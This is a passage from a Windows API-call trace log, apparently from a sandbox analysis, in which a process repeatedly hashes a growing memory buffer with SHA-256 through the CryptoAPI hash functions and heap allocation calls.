Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.639] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0119.639] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.639] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c5f0 [0119.639] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c5f0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c5f0, pdwDataLen=0xce59c) returned 1 [0119.639] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.639] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.639] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.640] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.640] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0119.641] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.641] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c620 [0119.641] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c620, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c620, pdwDataLen=0xce59c) returned 1 [0119.641] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.641] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.641] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.641] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.641] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0119.641] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.641] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c290 [0119.641] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c290, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c290, pdwDataLen=0xce59c) returned 1 [0119.641] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.641] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.641] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.642] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.642] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0119.642] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.642] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c8f0 [0119.642] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c8f0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c8f0, pdwDataLen=0xce59c) returned 1 [0119.642] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.642] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.642] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.643] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.643] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0119.643] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.643] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c590 [0119.643] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c590, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c590, pdwDataLen=0xce59c) returned 1 [0119.644] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.644] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.644] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.644] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.644] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0119.644] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.644] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c230 [0119.644] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c230, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c230, pdwDataLen=0xce59c) returned 1 [0119.644] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.644] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.644] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.645] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.645] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0119.645] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.645] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c650 [0119.645] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c650, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c650, pdwDataLen=0xce59c) returned 1 [0119.645] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.645] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.645] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.646] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.646] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0119.646] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.646] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c320 [0119.646] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c320, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c320, pdwDataLen=0xce59c) returned 1 [0119.646] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.646] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.646] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.646] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.646] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0119.646] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.646] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c680 [0119.646] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c680, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c680, pdwDataLen=0xce59c) returned 1 [0119.646] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.646] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.646] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.647] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.647] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0119.647] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.647] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c6b0 [0119.647] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c6b0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c6b0, pdwDataLen=0xce59c) returned 1 [0119.647] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.647] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.647] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.648] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.648] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0119.648] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.648] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c2c0 [0119.648] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c2c0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c2c0, pdwDataLen=0xce59c) returned 1 [0119.648] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.648] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.648] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.648] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.648] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0119.648] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.648] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c920 [0119.648] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c920, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c920, pdwDataLen=0xce59c) returned 1 [0119.648] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.649] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.649] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.649] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.649] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0119.649] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.649] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c6e0 [0119.649] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c6e0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c6e0, pdwDataLen=0xce59c) returned 1 [0119.649] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.649] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.649] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.650] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.650] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0119.650] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.650] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c350 [0119.650] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c350, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c350, pdwDataLen=0xce59c) returned 1 [0119.650] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.650] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.650] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.651] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.651] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0119.651] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.651] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c710 [0119.651] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c710, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c710, pdwDataLen=0xce59c) returned 1 [0119.651] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.651] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.651] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.651] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.651] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0119.651] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.651] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c380 [0119.651] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c380, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c380, pdwDataLen=0xce59c) returned 1 [0119.651] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.651] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.652] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.652] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.652] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0119.652] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.652] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c740 [0119.652] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c740, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c740, pdwDataLen=0xce59c) returned 1 [0119.652] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.652] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.652] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.653] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.653] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0119.653] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.653] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c770 [0119.653] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c770, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c770, pdwDataLen=0xce59c) returned 1 [0119.653] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.653] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.653] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.653] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.654] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0119.654] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.654] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c3b0 [0119.654] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c3b0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c3b0, pdwDataLen=0xce59c) returned 1 [0119.654] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.654] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.654] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.654] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.654] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0119.654] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.654] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c950 [0119.654] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c950, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c950, pdwDataLen=0xce59c) returned 1 [0119.654] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.654] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.654] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.655] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.655] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0119.655] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.655] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c7a0 [0119.655] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c7a0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c7a0, pdwDataLen=0xce59c) returned 1 [0119.655] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.655] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.655] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.656] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.656] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0119.656] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.656] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c3e0 [0119.656] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c3e0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c3e0, pdwDataLen=0xce59c) returned 1 [0119.656] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.656] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.656] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.656] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.656] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0119.656] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.656] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c7d0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c7d0, pdwDataLen=0xce59c) returned 1 [0119.657] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.657] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.657] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.657] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.657] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0119.657] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.657] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c410, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c410, pdwDataLen=0xce59c) returned 1 [0119.657] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.657] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.657] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.658] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.658] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0119.658] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.658] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c800, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c800, pdwDataLen=0xce59c) returned 1 [0119.658] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.658] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.658] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.658] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.658] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0119.658] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.659] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c830, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c830, pdwDataLen=0xce59c) returned 1 [0119.659] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.659] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.659] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.659] CryptCreateHash (in: hProv=0x72b850, 